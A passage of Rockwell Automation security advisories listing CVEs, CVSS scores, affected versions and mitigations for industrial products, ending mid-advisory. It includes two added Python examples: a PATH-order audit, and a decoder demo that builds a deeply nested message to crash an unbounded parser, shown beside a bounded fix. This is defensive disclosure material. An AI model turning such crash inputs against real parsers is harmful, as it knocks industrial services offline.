Rockwell Automation used v3.1 and v4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-22224

A time-of-check time-of-use (TOCTOU) vulnerability exists in VMware ESXi, which the affected products use. Exploitation of the vulnerability can allow a threat actor with local administrative privileges to execute code as the virtual machine's VMX process running on the host.

CVSS 3.1 Base Score: 9.3

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 9.4

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database:  Yes

 

CVE-2025-22225

A code execution vulnerability exists in VMware ESXi, which the affected products use. Exploitation of the vulnerability can allow a threat actor with privileges within the VMX process to trigger an arbitrary kernel write, leading to an escape of the sandbox.

CVSS 3.1 Base Score: 8.2

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 9.3

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database:  Yes

 

CVE-2025-22226

An out-of-bounds vulnerability exists in VMware ESXi, which the affected products use. Exploitation of the vulnerability can allow a threat actor with administrative privileges to leak memory from the VMX process.

CVSS 3.1 Base Score: 7.1

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

 

CVSS 4.0 Base Score: 8.2

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

Known Exploited Vulnerability (KEV) database:  Yes

Users can use Stakeholder-Specific Vulnerability Categorization (SSVC) to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

 

Critical
SD1721 | FactoryTalk® AssetCentre Multiple Vulnerabilities
Published Date:
January 29, 2025
Last Updated:
January 29, 2025
CVE IDs:
CVE-2025-0477, CVE-2025-0497, CVE-2025-0498
CVSS Scores (v3.1):
9.8, 7.0, 7.8
CVSS Scores (v4.0):
9.3, 7.3, 7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Versions | Corrected Version
FactoryTalk® AssetCentre | CVE-2025-0477 | All prior to V15.00.001 | V15.00.01 and later
FactoryTalk® AssetCentre | CVE-2025-0497 | V11, V12, and V13 (patch available) | V15.00.01 and later
FactoryTalk® AssetCentre | CVE-2025-0498 | V11, V12, and V13 (patch available) | V15.00.01 and later

 

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

For CVE-2025-0477:

• Update FactoryTalk® AssetCentre to v15.00.01 or later.
• The encrypted data is stored in a table in the database. Restrict database access so that non-essential users cannot reach it.

For CVE-2025-0497:

• Update FactoryTalk® AssetCentre to v15.00.01 or later.
• Apply patches to correct legacy versions:
  ◦ To apply the patch for LogCleanUp or ArchiveLogCleanUp, download and install the Rockwell Automation January 2025 Monthly Patch rollup, or later.
  ◦ To apply patches for EventLogAttachmentExtractor or ArchiveExtractor, locate article BF31148, download the patch files and follow the instructions.
• Restrict physical access to the machine to authorized users.

For CVE-2025-0498:

• Update FactoryTalk® AssetCentre to v15.00.01 or later.
• Apply patches to correct legacy versions:
  ◦ To apply the patch for download and install the Rockwell Automation January 2025 Monthly Patch rollup, or later
• Restrict physical access to the machine to authorized users.

For information on how to mitigate security risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization (SSVC) to generate more environment-specific prioritization.

VULNERABILITY DETAILS

CVE-2025-0477 and CVE-2025-0497 were reported to Rockwell Automation by Alban Avdiji of Nestlé. CVE-2025-0498 was found internally by Rockwell Automation during routine testing. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-0477 IMPACT

An encryption vulnerability exists in all versions prior to V15.00.001 of FactoryTalk® AssetCentre. The vulnerability exists due to a weak encryption methodology and could allow a threat actor to extract passwords belonging to other users of the application.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-326: Inadequate Encryption Strength
Known Exploited Vulnerability (KEV) database: No

CVE-2025-0497 IMPACT

A data exposure vulnerability exists in all versions prior to V15.00.001 of FactoryTalk® AssetCentre. The vulnerability exists due to storing credentials in the configuration file of EventLogAttachmentExtractor, ArchiveExtractor, LogCleanUp, or ArchiveLogCleanUp packages.

CVSS 3.1 Base Score: 7.0
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.3
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-522: Insufficiently Protected Credentials
Known Exploited Vulnerability (KEV) database: No

CVE-2025-0498 IMPACT

A data exposure vulnerability exists in all versions prior to V15.00.001 of FactoryTalk® AssetCentre. The vulnerability exists due to insecure storage of FactoryTalk® Security user tokens, which could allow a threat actor to steal a token and impersonate another user.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-522: Insufficiently Protected Credentials
Known Exploited Vulnerability (KEV) database: No

Critical
SD1715 | Path Traversal and Third-party Vulnerability in DataMosaix™ Private Cloud
Published Date:
January 28, 2025
Last Updated:
January 28, 2025
CVE IDs:
CVE-2025-0659, CVE-2020-11656
CVSS Scores (v3.1):
5.5, 9.8
CVSS Scores (v4.0):
7.0, 9.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Software Version | Corrected in Software Version
DataEdgePlatform DataMosaix™ Private Cloud | CVE-2025-0659 | <=7.11 | 7.11.01
DataEdgePlatform DataMosaix™ Private Cloud | CVE-2020-11656 | <=7.09 | 7.11.01

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-0659 IMPACT

A path traversal vulnerability exists in the affected product. By placing a path traversal character sequence in the body of a request to the vulnerable endpoint, it is possible to overwrite files outside of the intended directory. A threat actor with admin privileges could leverage this vulnerability to overwrite reports, including user projects.

CVSS 3.1 Base Score: 5.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N

CWE: 200 - Exposure of Sensitive Information to an unauthorized Actor
Known Exploited Vulnerability (KEV) database: No

CVE-2020-11656 IMPACT

The affected product uses SQLite, which contains a use-after-free vulnerability in the ALTER TABLE implementation, as demonstrated by an ORDER BY clause that belongs to a compound SELECT statement.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: 1395 - Dependency on Vulnerable third-party Component
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds

For information on how to mitigate security risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization (SSVC) to generate more environment-specific prioritization.

High
SD1718 | 5380/5580 Denial-of-Service Vulnerability
Published Date:
January 28, 2025
Last Updated:
January 30, 2025
CVE IDs:
CVE-2025-24478
CVSS Scores (v3.1):
6.5
CVSS Scores (v4.0):
7.1
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

AFFECTED PRODUCTS AND SOLUTION

Affected Product(s) | First Known in Software Version | Corrected in Software Version
GuardLogix 5580, Compact GuardLogix 5380 SIL3 | V33.011 | V33.017, V34.014, V35.013, V36.011 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-24478 IMPACT

A denial-of-service vulnerability exists in the affected products. The vulnerability could allow a remote, non-privileged user to send malicious requests resulting in a major nonrecoverable fault causing a denial-of-service.

CVSS 3.1 Base Score: 6.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 7.1
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-755: Improper Handling of Exceptional Conditions
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

• Restrict access to the task object via CIP Security and Hard Run.

• For information on how to mitigate security risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization (SSVC) to generate more environment-specific prioritization.

Critical
SD1719 | FactoryTalk® View Machine Edition Multiple Vulnerabilities
Published Date:
January 28, 2025
Last Updated:
February 05, 2025
CVE IDs:
CVE-2025-24479, CVE-2025-24480
CVSS Scores (v3.1):
8.4, 9.8
CVSS Scores (v4.0):
8.6, 9.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Version(s) | Corrected in Software Version
FactoryTalk® View Machine Edition | CVE-2025-24479 | < V15 | V15 and patch for V12, V13, V14 (AID 1152309)
FactoryTalk® View Machine Edition | CVE-2025-24480 | < V15 | V15 and patch for V12, V13, V14 (AID 1152571)

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-24479 IMPACT

A local code execution vulnerability exists in the product and version listed above. The vulnerability is due to a default setting in Windows and allows access to the Command Prompt as a higher-privileged user.

CVSS 3.1 Base Score: 8.4
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.6
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-863: Incorrect Authorization
Known Exploited Vulnerability (KEV) database: No

CVE-2025-24480 IMPACT

A remote code execution vulnerability exists in the product and version listed above. The vulnerability is due to a lack of input sanitization and could allow a remote attacker to run commands or code as a highly privileged user.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') & CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

• CVE-2025-24479:
  ◦ Upgrade to V15.00 or apply the patch in AID 1152309
  ◦ Control physical access to the system

• CVE-2025-24480:
  ◦ Upgrade to V15.00 or apply the patch in AID 1152571
  ◦ Protect network access to the device
  ◦ Strictly constrain the parameters of invoked functions

For information on how to mitigate security risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization (SSVC) to generate more environment-specific prioritization.

High
SD1720 | FactoryTalk® View Site Edition Multiple Vulnerabilities
Published Date:
January 28, 2025
Last Updated:
January 28, 2025
CVE IDs:
CVE-2025-24481, CVE-2025-24482
CVSS Scores (v3.1):
7.3
CVSS Scores (v4.0):
7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Version(s) | Corrected in Software Version
FactoryTalk® View SE | CVE-2025-24481 | < V15.0 | V15.0, and patch for V14 (AID 1152306)
FactoryTalk® View SE | CVE-2025-24482 | < V15.0 | V15.0, and patches for V12, V13, V14 (AID 1152304)

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-24481 IMPACT

An Incorrect Permission Assignment Vulnerability exists in the product and version listed above. The vulnerability is due to incorrect permissions being assigned to the remote debugger port and can allow for unauthenticated access to the system configuration.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N

CWE-732:  Incorrect Permission Assignment for Critical Resource
Known Exploited Vulnerability (KEV) database: No

CVE-2025-24482 IMPACT

A Local Code Injection Vulnerability exists in the product and version listed above. The vulnerability is due to incorrect default permissions and allows for DLLs to be executed with higher level permissions.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N

CWE-94: Improper Control of Generation of Code ('Code Injection')
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         For CVE-2025-24481:
    ·         Upgrade to V15 or apply patch (Answer ID 1152306)
    ·         Protect physical access to the workstation
    ·         Restrict access to port 8091 at the network or workstation

·         For CVE-2025-24482:
    ·         Upgrade to V15 or apply patch (Answer ID 1152304)
    ·         Check the PATH environment variable and make sure the FactoryTalk® View SE installation path (C:\Program Files (x86)\Common Files\Rockwell) comes before all other entries
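A check for the PATH-ordering mitigation above, added here as an example; it is not Rockwell Automation code. It parses a Windows PATH string, locates the FactoryTalk View SE Common Files directory named in the mitigation, and lists every entry searched before it, which are the directories from which a planted DLL would be picked up first. It uses `ntpath` so the comparison is Windows-style (case-insensitive, trailing separator ignored) regardless of the host it runs on, and it accepts any required directory, not only the Rockwell one. The two sample PATH values are constructed for the demonstration; on a real workstation pass `os.environ["PATH"]` (or the machine-scope value from the registry) instead.

```python
"""PATH-order check for the CVE-2025-24482 mitigation (added example, not Rockwell code)."""
import ntpath
from dataclasses import dataclass, field

# Directory the advisory says must be searched first.
REQUIRED_FIRST = r"C:\Program Files (x86)\Common Files\Rockwell"


def _normalize(entry: str) -> str:
    """Windows compares paths case-insensitively; also drop quotes and a trailing separator."""
    entry = entry.strip().strip('"')
    return ntpath.normcase(ntpath.normpath(entry)) if entry else ""


@dataclass
class PathCheck:
    ok: bool                 # True only if the required directory is the first entry
    position: int            # 0-based index of the required entry, -1 if absent
    preceding: list = field(default_factory=list)  # entries searched before it


def check_path_order(path_value: str, required: str = REQUIRED_FIRST) -> PathCheck:
    """Parse a Windows PATH string (';'-separated) and locate `required` in it."""
    entries = [e for e in path_value.split(";") if e.strip()]
    target = _normalize(required)
    for i, entry in enumerate(entries):
        if _normalize(entry) == target:
            return PathCheck(ok=(i == 0), position=i, preceding=entries[:i])
    return PathCheck(ok=False, position=-1, preceding=entries)


def audit(path_value: str, required: str = REQUIRED_FIRST) -> list:
    """Findings as text lines; an empty list means the ordering is as the mitigation requires."""
    result = check_path_order(path_value, required)
    if result.ok:
        return []
    if result.position < 0:
        return [f"{required} is not on PATH at all"]
    lines = [f"{required} is entry {result.position}; directories searched before it:"]
    lines += [f"  {p}" for p in result.preceding]
    return lines


# Constructed sample values for the demonstration (not taken from a real workstation).
SAMPLE_BAD = (
    r"C:\Windows\system32;C:\Windows;C:\Tools\bin;"
    r"C:\Program Files (x86)\Common Files\Rockwell\;C:\Program Files\Git\cmd"
)
SAMPLE_GOOD = r"C:\Program Files (x86)\Common Files\Rockwell;C:\Windows\system32;C:\Windows"

if __name__ == "__main__":
    # On the workstation itself: audit(os.environ["PATH"]) after `import os`.
    for line in audit(SAMPLE_BAD) or ["PATH order OK"]:
        print(line)
```

Every directory the audit lists is one that the loader consults before the Rockwell directory; the mitigation is satisfied only when the list is empty, and any listed directory that non-administrators can write to deserves immediate attention.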

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High
SD1716 | KEPServer Denial-of-Service Vulnerability Found During Pwn2Own Competition
Published Date:
January 28, 2025
Last Updated:
August 06, 2025
CVE IDs:
CVE-2023-3825
Products:
KEPServer
CVSS Scores (v3.1):
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Versions | Fixed Version
KEPServer | CVE-2023-3825 | 6.0 - 6.14.263 | 6.15

SECURITY ISSUE DETAILS

Rockwell Automation received a report from PTC regarding a security issue discovered by Security Researchers of Claroty Team82. 

Rockwell Automation uses the latest version of the CVSS scoring system to assess the security issues.

CVE-2023-3825 IMPACT

KEPServerEX versions 6.0 to 6.14.263 can be made to decode a recursively defined object, leading to uncontrolled resource consumption. KEPServerEX uses OPC UA, a protocol that defines various object types which can be nested to build complex arrays. The decoder does not check whether such an object is recursively defined, so an attacker could send a crafted message that the decoder attempts to decode until the stack overflows and the device crashes.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-400: Uncontrolled Resource Consumption
Known Exploited Vulnerability (KEV) database: No
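The failure mode described above, as an added example that is not PTC/Kepware or OPC UA stack code: a tiny constructed wire format (tag byte, little-endian int32 count, then the elements) stands in for OPC UA's nested array types. `decode_unbounded` recurses as deep as the message tells it to, which is the CWE-400 condition the advisory describes; in CPython that ends in `RecursionError`, in a native decoder it is a stack overflow and a crash. `decode_bounded` caps nesting depth and checks the declared element count against the bytes actually received. `MAX_DEPTH` and `MAX_ELEMENTS` are assumed values for the demonstration, not limits taken from the product.

```python
"""Unbounded recursion in a nested-array decoder, and the depth-bounded fix.

Added example. The format below is constructed for illustration and is not
the OPC UA binary encoding; it only reproduces the property that matters
here: an array element may itself be an array, to any depth the sender chooses.
"""
import struct

TAG_INT32 = 0x01   # followed by a 4-byte little-endian value
TAG_ARRAY = 0x02   # followed by an int32 count, then `count` encoded elements

MAX_DEPTH = 16          # assumed limit on nesting depth
MAX_ELEMENTS = 10_000   # assumed limit on a declared array length


def decode_unbounded(buf: bytes, pos: int = 0):
    """Vulnerable: recursion depth is controlled entirely by the input."""
    tag = buf[pos]
    if tag == TAG_INT32:
        (value,) = struct.unpack_from("<i", buf, pos + 1)
        return value, pos + 5
    if tag == TAG_ARRAY:
        (count,) = struct.unpack_from("<i", buf, pos + 1)
        pos += 5
        items = []
        for _ in range(count):
            item, pos = decode_unbounded(buf, pos)  # recurses with no depth check
            items.append(item)
        return items, pos
    raise ValueError(f"unknown tag 0x{tag:02x} at offset {pos}")


def decode_bounded(buf: bytes, pos: int = 0, depth: int = 0):
    """Hardened: reject messages that nest too deep or declare implausible lengths."""
    if depth > MAX_DEPTH:
        raise ValueError(f"nesting deeper than {MAX_DEPTH} rejected")
    tag = buf[pos]
    if tag == TAG_INT32:
        (value,) = struct.unpack_from("<i", buf, pos + 1)
        return value, pos + 5
    if tag == TAG_ARRAY:
        (count,) = struct.unpack_from("<i", buf, pos + 1)
        pos += 5
        # A negative or oversized count cannot be backed by the bytes actually received
        # (every element occupies at least one byte), so reject before allocating anything.
        if count < 0 or count > MAX_ELEMENTS or count > len(buf) - pos:
            raise ValueError(f"implausible array length {count} at offset {pos - 4}")
        items = []
        for _ in range(count):
            item, pos = decode_bounded(buf, pos, depth + 1)
            items.append(item)
        return items, pos
    raise ValueError(f"unknown tag 0x{tag:02x} at offset {pos}")


def nested_array(levels: int) -> bytes:
    """Constructed message: `levels` arrays, each holding exactly one array, then one int."""
    payload = bytes([TAG_INT32]) + struct.pack("<i", 7)
    for _ in range(levels):
        payload = bytes([TAG_ARRAY]) + struct.pack("<i", 1) + payload
    return payload


def try_decode(decoder, buf: bytes) -> str:
    """Outcome label so the two decoders can be compared on the same input."""
    try:
        decoder(buf)
        return "decoded"
    except RecursionError:
        return "stack exhausted"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    benign, hostile = nested_array(3), nested_array(5000)
    print("benign :", try_decode(decode_unbounded, benign), "/", try_decode(decode_bounded, benign))
    print("hostile:", try_decode(decode_unbounded, hostile), "/", try_decode(decode_bounded, hostile))
```

The hostile message is only about 25 KB, yet it drives the unbounded decoder 5000 frames deep; the bounded decoder stops at the 17th level without touching the rest of the input. The length check matters independently of depth: a single array header claiming 2^31-1 elements must be refused before the decoder starts allocating or looping on its behalf.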

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·         NVD - CVE-2023-3825

·         PTC KEPServerEX | CISA

·         CS405439 - Security vulnerabilities identified in PTC Kepware products - November 2023

 Glossary:

Claroty Team82: a research arm that provides vulnerability and threat research to customers and defenders of industrial networks worldwide

KEPServerEX: a connectivity platform that provides a single source of industrial automation data to applications

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited 

High
SD1717 | PowerFlex® 755 Credential Exposure Vulnerability
Published Date:
January 28, 2025
Last Updated:
January 28, 2025
CVE IDs:
CVE-2025-0631
Products:
PowerFlex 755
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Version(s) | Fixed Version
PowerFlex® 755 | <=16.002.279 | v20.3.407

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerability.

CVE-2025-0631 IMPACT

A Credential Exposure Vulnerability exists in the above-mentioned product and version. The vulnerability is due to using HTTP resulting in credentials being sent in clear text.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE-319: Cleartext Transmission of Sensitive Information
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Critical
SD1714 | PowerMonitor™ 1000 Remote Code Execution and Denial-of-Service Vulnerabilities via HTTP Protocol
Published Date:
December 17, 2024
Last Updated:
December 17, 2024
CVE IDs:
CVE-2024-12371, CVE-2024-12372, CVE-2024-12373
CVSS Scores (v3.1):
9.8, 9.8, 9.8
CVSS Scores (v4.0):
9.3, 9.3, 9.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: December 17, 2024

Last updated: August 6, 2025

Revision Number: 1.0

CVSS Score: v3.1: 9.8/10, v4.0: 9.3/10

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected firmware revision | Corrected in firmware revision
PM1k 1408-BC3A-485 | <4.020 | 4.020
PM1k 1408-BC3A-ENT | <4.020 | 4.020
PM1k 1408-TS3A-485 | <4.020 | 4.020
PM1k 1408-TS3A-ENT | <4.020 | 4.020
PM1k 1408-EM3A-485 | <4.020 | 4.020
PM1k 1408-EM3A-ENT | <4.020 | 4.020
PM1k 1408-TR1A-485 | <4.020 | 4.020
PM1k 1408-TR2A-485 | <4.020 | 4.020
PM1k 1408-EM1A-485 | <4.020 | 4.020
PM1k 1408-EM2A-485 | <4.020 | 4.020
PM1k 1408-TR1A-ENT | <4.020 | 4.020
PM1k 1408-TR2A-ENT | <4.020 | 4.020
PM1k 1408-EM1A-ENT | <4.020 | 4.020
PM1k 1408-EM2A-ENT | <4.020 | 4.020

SECURITY ISSUE DETAILS

Rockwell Automation used versions 3.1 and 4.0 of the CVSS scoring system to assess the following security issues. The following issues were reported by Vera Mens of Claroty Research - Team82.

CVE-2024-12371 IMPACT

A device takeover security issue exists in the affected product. It allows a new Policyholder user to be configured via the API without any authentication. A Policyholder user is the most privileged user: it can perform edit operations, create admin users and perform a factory reset.

CVSS 3.1 Base Score: 9.8/10
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3/10
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-420: Unprotected Alternate Channel
Known Exploited Vulnerability (KEV) database: No

CVE-2024-12372 IMPACT

A denial-of-service and possible remote code execution security issue exists in the affected product. The issue results in corruption of heap memory, which may compromise the integrity of the system and could allow remote code execution or a denial-of-service attack.

CVSS 3.1 Base Score: 9.8/10
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3/10
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-122: Heap-based Buffer Overflow
Known Exploited Vulnerability (KEV) database: No

CVE-2024-12373 IMPACT

A denial-of-service security issue exists in the affected product. It results in a buffer overflow which could cause a denial-of-service.

CVSS 3.1 Base Score: 9.8/10
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3/10
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Customers using the affected software who cannot upgrade to one of the corrected versions should use the security best practices.

·       Security Best Practices

Glossary

Buffer Overflow: when a program writes more data to a buffer than it can hold, causing the excess data to overflow into adjacent memory locations

Denial-of-Service: an attack that makes a device or service unavailable to its legitimate users, for example by crashing it or exhausting its resources

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited 

High
SD1713 | Multiple Code Execution Vulnerabilities in Arena®
Published Date:
December 04, 2024
Last Updated:
December 19, 2024
CVE IDs:
CVE-2024-11155, CVE-2024-11156, CVE-2024-11158, CVE-2024-12130, CVE-2024-11157, CVE-2024-12672, CVE-2024-11364, CVE-2024-12175
CVSS Scores (v3.1):
7.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Published Date: 12/04/24

Last updated: August 6, 2025

Revision Number: 2.0

CVSS Score: v3.1: 7.8, v4.0 8.5

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Software Version | Corrected in Software Version

Software - Arena
  CVE-2024-11155 | All versions 16.20.00 and prior | V16.20.06 and later
  CVE-2024-11156 | All versions 16.20.03 and prior | V16.20.06 and later
  CVE-2024-11158 | All versions 16.20.00 and prior | V16.20.06 and later
  CVE-2024-12130 | All versions 16.20.05 and prior | V16.20.06 and later
  CVE-2024-11157 | All versions 16.20.06 and prior | V16.20.07 and later
  CVE-2024-12175 | All versions 16.20.06 and prior | V16.20.07 and later

Software – Arena® 32 bit
  CVE-2024-12672 | All versions 16.20.07 and prior | n/a – see mitigations
  CVE-2024-11364 | All versions 16.20.06 and prior | V16.20.07 and later

SECURITY ISSUE DETAILS

Rockwell Automation uses the latest version of the CVSS scoring system to assess the security issues. These security issues were reported by ZDI (Zero Day Initiative).

CVE-2024-11155 IMPACT

A “use after free” code execution security issue exists in the affected products. A threat actor could craft a DOE file that forces the software to use a resource that has already been freed, and leverage this to execute arbitrary code. A legitimate user must open the malicious file crafted by the threat actor for this to be exploited.

CVSS 3.1 Base Score: 7.8
